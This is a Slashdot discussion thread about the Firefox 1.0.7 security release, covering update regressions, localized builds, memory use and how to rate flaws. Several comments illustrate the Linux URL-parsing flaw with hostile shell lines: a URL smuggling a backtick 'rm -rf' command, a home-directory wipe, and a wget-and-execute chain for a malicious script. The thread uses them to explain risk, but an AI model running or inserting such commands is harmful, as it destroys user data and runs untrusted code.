Firefox 1.0.7 Released 366
hackajar writes "Firefox 1.0.7 has been released today. From the announcement "Fixes are included for the international domain name (IDN) link buffer overflow vulnerability and the Linux command line URL parsing flaw. There are also other security and stability changes, including a fix for a crash experienced when using certain Proxy Auto-Config scripts. In addition, some regressions introduced by previous 1.0.x security updates have been resolved.""
More stable (Score:4, Funny)
(please understand this is a joke)
something concerns me (Score:5, Insightful)
Too many regressions caused by security updates, and people will turn off auto-update. That's the very reason that Microsoft moved to a monthly update cycle. Getting updates out quickly is important, but unless the security hole is being actively exploited, it's probably more important to make sure nothing else gets broken by the fix. If you convince people not to install updates, then you're in really big trouble.
Re:something concerns me (Score:5, Insightful)
Don't use your distro tools to install it... (Score:2, Interesting)
I had my Firefox 1.0.6. installed in a directory under
Then, as me, I set up a directory called Firefox107. I made a directory under that one called Firefox as the installation area for the install of Firefox 1.0.7. I then downloaded the Linux installer for 1.0.
Re:Don't use your distro tools to install it... (Score:5, Informative)
On the other hand I think distros need to recognize the need of users to install software at the user-level and make their packages and package mgmt system work better for that. As it is they tend to make it difficult to install packages just for a single user.
Re:Don't use your distro tools to install it... (Score:5, Insightful)
"The install was as easy as anything packaged by Vise or InstallShield"
Can you please pass some of that crack you seem to be smoking? I'm a big linux fan, but installing anything, not in the least a user install from firefox, does not compare with the "double click setup.exe" from vise or installshield.
And before all the fanboys knee-jerk with the security/spyware/virus/whatever-my-linux-kung-fu-
Re:Don't use your distro tools to install it... (Score:5, Interesting)
The fact that it is possible for an application to be installed by any mechanism other than the official method provided by the desktop/OS, thus straying from all standard conventions defined by the desktop/OS, means it's too easy for users to screw up and break things. The fact that an application must come with its own installation executable just illustrates how the desktop/OS is failing to provide the services the application developers need.
The desktop/OS should require a software package to provide a data-based manifest of installation actions it needs (generally similar to Microsoft's MSI/Windows Installer technology, but without the notion of Custom Actions), and the desktop/OS should execute the installation. And that should be the ONLY way for anything to get installed onto the system (unlike the architecture of Windows, where standalone installers such as InstallShield can still bypass the central MSI/Windows Installer way of doing things).
Re:Don't use your distro tools to install it... (Score:3, Insightful)
On linux you apt-get install app or select it and then click install in synaptic. Then configure the app manually. For many things you can simply run appname-configure afterward to configure.
In case you haven't noticed, the processes are mostly the same, ex
Re:Don't use your distro tools to install it... (Score:4, Informative)
I don't think so.
Normally, you install as root, and run as user.
This means, that, as a user, you cannot damage your installation.
Now, you run as the same user that installed it.
This means that you can damage the installation as well.
Re:Don't use your distro tools to install it... (Score:3, Funny)
I don't know about you, but I clicked
Re:Don't use your distro tools to install it... (Score:3, Informative)
Unless? (Score:5, Interesting)
Enter the paradox: If the fix isn't released until a month, the security hole CAN and WILL be actively exploited.
In other words, is it worth to replace a critical bug (security) with a minor bug (annoyance)?
download mirrors are here (Score:2, Informative)
Re:More stable-Marketing. (Score:2)
As long as it doesn't randomly use 99% of my CPU under windows and doesn't crash with java under linux, I am happy.
Re:More stable-Marketing. (Score:4, Funny)
Full release notes... (Score:5, Informative)
Also, from the Mozillazine article, looks like Portable Firefox [johnhaller.com] has been updated as well.
And I'm posting this with 1.0.7, good times...
Some things, money can't buy ... (Score:5, Funny)
Getting to download the next version of Firefox before the site gets Slashdotted: priceless !
Re:Some things, money can't buy ... (Score:2)
Re:Some things, money can't buy ... (Score:5, Funny)
Re:Some things, money can't buy ... (Score:3, Funny)
Getting to download the next version of Firefox because mozilla.org can withstand a slashdotting: $0.00
Flaming a stupid use of an old joke: priceless!
Re:Some things, money can't buy ... (Score:3, Funny)
Who pissed in your cornflakes this morning?
Quick to the point (Score:5, Insightful)
Re:Quick to the point (Score:3, Funny)
Which virus does this Mozilla release include?
Re:Quick to the point (Score:3, Insightful)
BTW, the use of "spin" was deliberate. I've yet to see numbers for both sides that prove MF is more reactive than MS, even though it appears to be "common knowledge". IIRC, the last release (1.0.6) fixed bugs found in March.
Re:Quick to the point (Score:3, Informative)
http://local`rm -rf $HOME1`host
through the shell, which of course is bad. However, the key points here are
a) It only affects the Linux/Unix platform
b) It only a
No translated version (Score:5, Insightful)
Think about your grandpa, who doesn't know english. He can't use non-translated build and is left with vulnerable, older version.
Good work, Firefox developers!
Re:No translated version (Score:5, Interesting)
I'm seriously thinking about switching to Opera, myself. It's faster, it uses less memory, it's more standards-compliant, and now it's free, too - I honestly don't know what's keeping me, outside of laziness, maybe.
I hope some of the Mozilla people (Asa etc.) read this and think about it. Do you hear me? This kind of attitude will not convince Seamonkey users to switch to Firefox, it will convince them to switch to something else entirely because you're making it clear that you don't give a shit about them! You have a big problem, and it will come back to bite you sooner or later, so you'd better start working on it - or at least acknowledge that it exists.
Re:No translated version (Score:5, Informative)
Re:No translated version (Score:2)
After all, the bookmark names aren't going to change between different language versions of Mozilla.
Be thankful: my grandfather uses AOL.
Re:No translated version (Score:3, Insightful)
Nasty bugs. (Score:5, Insightful)
Re:Nasty bugs. (Score:5, Funny)
HA! I don't have your insecure Linux problems. I run Windows!
Re:Nasty bugs. (Score:2)
Re:Nasty bugs. (Score:3, Funny)
You don't really need the "S".
Now, I know what you're thinking. You're thinking I'm going reuse the tired meme of, "there are no women on Slashdot".
However, you'd be wrong...
It's actually because all the female moderators have a wonderful sense of humor.
They're also all worldly, erudite, perspicacious, compassionate, shockingly beautiful, and, "really have it together".
(+1, Insightful?)
Re:Nasty bugs. (Score:2)
Re:Nasty bugs. (Score:3, Insightful)
Anyone can reinstall an OS in an hour. What matters is people's DATA. You know, pictures, documents, etc, accumulated over years. Stuff all users should back up but most users don't. Those are all things that can be trashed when an exploit hits them even when they aren't running as root.
The OS being intact is real nice for your geek pride, but but all the data files being trashed is a real loss to normal people.
Re:Nasty bugs. (Score:5, Insightful)
`rm -rf ~`
Because, of course, you wouldn't have anything valuable stored in your home directory, would you?
Not to mention that root privledges are not required to do a lot of things... like, oh say:
wget ftp://somesite/malicious_script [somesite] && chmod +x malicious_script &&
What does malicious script do? Anything it wants -- including downloading and running root kits (after figuring out exactly which ones you are vulnerable to), sending out massive spam attacks, installing a user-level trojan that allows for remote controlled DDoS, etc.
I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours) and it doesn't prevent a lot of attacks that are perfectly happy to run in non-privledged space.
Different approaches. (Score:5, Interesting)
The worst that should ever happen is that you lose any new data (from this morning until now).
The really important data is usually kept inside databases that the user does not have rights to delete.
Wiping out your home directory is only "annoying" (unless you have an important meeting in a few minutes).
Infecting the system is "BAD" because then EVERYONE's data is vulnerable AND you cannot trust last night's backups. You must go back and find out when you were infected and, in some cases, recreate ALL of the data that was in those databases since that point.
Sure, the user might be pissed that his spreadsheet was deleted by the "cool screensaver" that he just tried to download AND he has a meeting with the division president in the next 15 minutes
but that don't mean jack when the CFO notices that none of the numbers match for the last 3 months anymore.It's not a "miracle cure" but it does protect the most important information the company has.
Ideally, the user's home directories will be set to non-execute so that crap they download won't destroy their data.
Even with both of those in place, I still get people who DELETE THEIR OWN FILES and need them restored from the night before.
Security is all about IDENTIFYING the risks and REDUCING them.
I can reduce the risks of everything else to a point below that of regular human stupidity. But nothing will ever save you from that.
Re:Nasty bugs. (Score:5, Insightful)
There really needs to be some standard for rating security holes.
I mean, if this is rated very critical what the heck do you call a remote exploit? Very,very,very critical or what? Secunia, rated 7/5?
There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.
Mod parent +25. (Score:4, Insightful)
#1. Remote root access that does NOT require human intervention or other app running.
#2. Remote non-root access that does NOT require human intervention or other app running.
#3. Local root access that does NOT require human intervention or other app running.
#4. Local non-root access that does NOT require human intervention or other app running.
#5. Local root access that requires some human interaction or some combination of apps.
#6. Local non-root access that requires some human interaction or some combination of apps (this is where this exploit is)
#7. Remote OS crash
#8. Remote app crash
#9. Local OS crash
#10. Local app crash
This is MY opinion. Get your own opinion. There is no way this exploit is "critical". It's one step above a stupid DoS attack and would NOT affect ANY of my servers.
Re:Nasty bugs. (Score:5, Insightful)
Symantec sells security software that covers up Microsoft vulnerabilities.
If everybody stopped using IE and Outlook, half of their business might go away.
Colour me confused... (Score:4, Insightful)
Re:Colour me confused... (Score:3, Insightful)
Memory leak issue fixed? (Score:5, Informative)
localised builds (Score:5, Interesting)
I can't understand why bugfixes, which wont change any of the text shown to the user (other than perhaps the version number), cannot be released for all locals at the same time.
Re:localised builds (Score:2)
I can't understand why bugfixes, which wont change any of the text shown to the user (other than perhaps the version number), cannot be released for all locals at the same time.
The localised versions, even if it's an apparently near identical one like British-English, still needs to be built by the relevant localisation team. Though I suspect it could be automated somewhat to avoid this TERRIBLE waiting ;-)
/also still waiting on British 1.0.6...
Re:localised builds (Score:5, Funny)
Re:localised builds (Score:5, Funny)
That would be localised then.
Re:localised builds (Score:3, Funny)
We can't; we don't have the extra vowels. Unlike the British Empire, we didn't participate in imperialist vowel-looting of Balkan places like Krk and Vrbnik in the 19th Century.
Re:localised builds (Score:2, Interesting)
What are the differences?
Why should anyone bother?
Re:localised builds (Score:5, Funny)
It's possible that it also replaces outlandish words like "cookies" with more familiar terms like "biscuits".
Re:localised builds (Score:4, Funny)
Back in the day... John Clease was one of Jay Leno's guests during the Clinton/Lewinsky scandal. He described 3 differences between Americans and the British.
1) We (the British) speak English.
2) When we hold a world championship sporting event we invite teams from other countries.
3) When we meet our head of state we only go down on ONE knee.
One Fast Download! (Score:2, Insightful)
Now I wonder if my extensions will crash or act buggy...ah, well....the price was right
Great! (Score:5, Insightful)
Re:Great! (Score:2)
750MB? (Score:3, Informative)
Well, let's see, my DSL is quite fast, it is 6mbits/second actually (lucky me). That means that Firefox is storing the equivalent of 1,000 seconds or about 20 minutes of continuous downloading. For other people it could be easily double that.
Why doesn't that seem entirely correct to me? I'd know if I sat through 20 minutes total downloading.
BTW, IE doesn't soak up as much RAM, and it's pretty damn fast.
Firefox probably needs to look at
Re:Great! (Score:3, Informative)
2) Other browsers such as IE don't have this problem
Do any of the devs run tools like BoundsChecker over their code?
Re:Great! (Score:2)
How many tabs do you have open?
Re:Great! (Score:5, Informative)
See here for workaround: http://fusion94.org/archives/2005/07/firefox_memo
Re:Great! (Score:2)
Middle-click on OSX? (Score:5, Interesting)
ever show up in an official release for OSX? It's really retarded that I must rely on nightly betas in order to use this simple feature, in which case I can't use most of the plugins that made Firefox attractive to me in the first place. Very frustrating.
Re:Middle-click on OSX? (Score:2)
If you play with the 1.5 beta, it's fixed, just like in the nightlies, and none of your plugins will work, just like the nightlies.
I'm still using Safari because of stupid stuff like this...
Re:Middle-click on OSX? (Score:2)
Re:Middle-click on OSX? (Score:2)
Re:Middle-click on OSX? (Score:3, Funny)
(no masturbation jokes please)
1.0.7 or.. (Score:2)
I guess 1.0.7 has more security fixs but beta has some nice new features... which to use?
Re:1.0.7 or.. (Score:2)
Comment removed (Score:3)
Bad Ads (Score:5, Interesting)
In some cases, I'm lucky to get an exception and can restart Firefox. However, in most cases, the application freezes. On OSX, I get the swirling beach ball of death and have to manually force quit Firefox. On windows, I can usually close Firefox, but only the main window closes. I still have to manually kill the process before I can start a new instance.
Since then, I've moved on to 1.5 alpha and it while I don't believe I am currently experiencing those problems, 1.5 alpha has a whole new set of problems all its own.
My question is... have these ad related crashes been fixed (or am I the only experiencing them)? I'd like us to the most stable version possible, but when 1.5 alpha is better than the 1.0x builds, I'm left wondering what went wrong...
If this isn't resolved soon, I just might have to give AdBlock another shot. I'm trying to be a good netizen, but when you're ads kill my browser, you leave me with little choice!
Bryan
Re:Bad Ads (Score:2, Informative)
Re:Bad Ads (Score:2)
Re:Bad Ads (Score:2)
Are you running Flashblock? Make sure you have the latest revision if so -- there are some known problems w/ Firefox 1.0.x, Flashblock, and some Flash ads. The Flashblock devs have tried to work around them, but it's a problem in Firefox itself. I never experienced them on Blue's (yes, I'm the same guy from there), but I experienced them fairly often on Tech Report until I went to 1.5B1.
And yes, 1.5B1 fixes the issue. It's been fixed in tru
Re:Bad Ads (try this first) (Score:4, Interesting)
I noticed some of these too. Quite annoying. Instead of using Adblock or something similar, first try downloading a good hosts file for blocking ads. Info and links [wikipedia.org]
Straight to Mozilla's FTP (Score:4, Informative)
http://ftp.mozilla.org/pub/mozilla.org/firefox/re
Mac OS X
http://ftp.mozilla.org/pub/mozilla.org/firefox/re
Windows
http://ftp.mozilla.org/pub/mozilla.org/firefox/re
How's the performance? (Score:2)
The M$ Take (Score:2, Insightful)
And somehow, these fixes make the browser all the less secure [slashdot.org] in the eyes of the big guys.
Firefox annoyances (Score:5, Interesting)
Why do they call it "a new version"? (Score:2)
HP-UX Port (Score:2, Interesting)
I know there is a "official" HP mozilla build. But I like more firefox (slimer and faster). Specialy because my desktop is not that fast (PA8500 400mhz).
I think I'll wait a week or so (Score:4, Funny)
For Firefox 1.0.8 to be released
Package Management (Score:3, Interesting)
Anyhow, the basic idea is that Firefox is a package that has to be updated at specific times, and I know when those times are, and they aren't necessarily times that my system as a whole needs to be updated.
There are few other packages that depend on Firefox; all I can really think of are plugins and extensions. Plugins don't typically require a specific FF version, and I get my extensions centrally from mozdev. So can you guys think of anything I'd lose by unmerging FF from Portage, installing a stub in its place, and just using the official builds from mozilla.org? Besides the potential optimization? (I would say integration and consistency with the overall system in terms of file placement and stuff, but... that doesn't seem to happen anyway. It's not an easy thing to fit a huge X application into Unix directory conventions based on the concept of many small programs doing one thing well...)
The main other package to which I'd apply this type of thinking is OOo. I wouldn't apply it to KDE or Gnome (though I don't directly use either) because they contain many useful libraries, and I feel that the handling of libraries is a real strength of package management systems. Can you guys think of any other packages that might not be best handled by package management?
Re:And yet..... (Score:5, Informative)
Re:And yet..... (Score:4, Funny)
I like Firefox but being forced to wait days -- or longer -- for a security update is utterly pathetic. If I wanted a browser with known exploits that I can't patch I'd use IE.
Re:And yet..... (Score:2)
True, two weeks is pretty long. Honestly, I don't know exactly how long before an update will appear, because as long as it appears in a reasonable amount of time I'm fine with it. You have the option to get the update faster. As far as I know, the purpose of the staggered update schedule is to reduce bandwidth strain, so not everyone is downloading the update at the same time. I don't see a major problem with that, especially since
Re:And yet..... (Score:5, Interesting)
That's simply unacceptable. Whether the reason is good or bad, and I'm understanding of the bandwidth issue and the costs associated, we're leaving potentially millions of machines open to exploit. Hardly a claim to a more secure future.
I can't wait until 1.5 goes live and we can ditch this stupid unmodular system that we've been 'graced' with.
Re:And yet..... (Score:2)
I couldn't agree more. Hopefully that will also bring about improvements on the speed of updates getting out to people.
Re:And yet..... (Score:2)
You're not forced to wait days. Just download the source, find the bugs, and fix them yourself. After all, isn't the lack of source code what you meant by IE being "a browser... that I can't patch"? It's not like Microsoft doesn't release updates for IE or anything.
Re:Update (Score:2)
Supposedly, 1.5 will be better in this respect, as it can update itself using small patches.
Re:blah blah bugs blah blah security (Score:2, Insightful)
Re:blah blah bugs blah blah security (Score:2)
although soon afterwards the pres of Mozilla europe retorted: http://software.silicon.com/security/0,39024655,39 152480,00.htm [silicon.com].
I don't work for silicon.com, that's just what my google search lead me to...that said, this symantec things been in my RSS feeds a lot recently...
Re:blah blah bugs blah blah security (Score:2)
Re:An update problem... (Score:3, Interesting)
FFS (Score:2)
Re:Premature announcement ? (Score:2)
Re:Premature announcement ? (Score:2)
Re:Premature announcement ? (Score:2)
So I'm glad that there is an additional +0.0.1 update, even if it is not yet updated automatically. Firefox is one of the nicest browsers out there, but there is still a bit of a way to go for a +0.1 rel
Re:I'm confused (Score:5, Informative)
From the trunk, every so often (less frequently in the last two years) branches are cut. These branches are the 1.x branches, and from them the stable releases are created. Currently we have the 1.7 branch as the long-lived stable-branch (MoFo is committed to keeping its builds from this branch updated with security fixes for a while yet, while not changing its functionality). Mozilla 1.7.11 and this release, Firefox 1.0.7, are made from this branch. Also expect upcoming Thunderbird 1.0.7 and Mozilla 1.7.12 releases.
The Aviary 1.0 branch is basically the same as the Mozilla 1.7 branch, but is referred to specifically when talking about Firefox and Thunderbird. (It's more a CVS branch tag than something you should know about.)
Then, only recently, the 1.8 branch was created. A number of must-fix bugs still present on this branch have been identified, and these are currently being worked on. Once that's all done, Firefox 1.5, Thunderbird 1.5 and SeaMonkey 1.0 (the successor to the Mozilla application suite) will be released from it.
Deer Park 1.5 Beta 1 and SeaMonkey 1.0 Alpha were releases from this newly formed 1.8 branch, to show what is being worked toward.
It's likely that version numbers of all products/projects will converge at 2.0 in 1-2 years - although this might come after Mozilla 1.7.11 or thereabouts, depending on the necessary functionality specified for Mozilla/Gecko 2.0 (so based on what the backend needs, not frontend functionality).
Of course, it's just as likely that this won't happen. I'd bet MoFo itself doesn't know yet. They're not all that good at planning ahead.
Re:1.5 Beta / Deer Park (Score:2)
One thing is still lacking: - Beauty. Firefox on Linux is still ugly as compared to its windows counterpart. When will they do something about this?
Re:Sex sells (Score:2, Funny)
Re:A week too late (Score:5, Informative)
I honestly don't care about the whole open source thing. I don't have a problem with companies keeping their source private. Hell, they wrote it. However, it seems to me that firefox is simply a better product that either IE or Opera.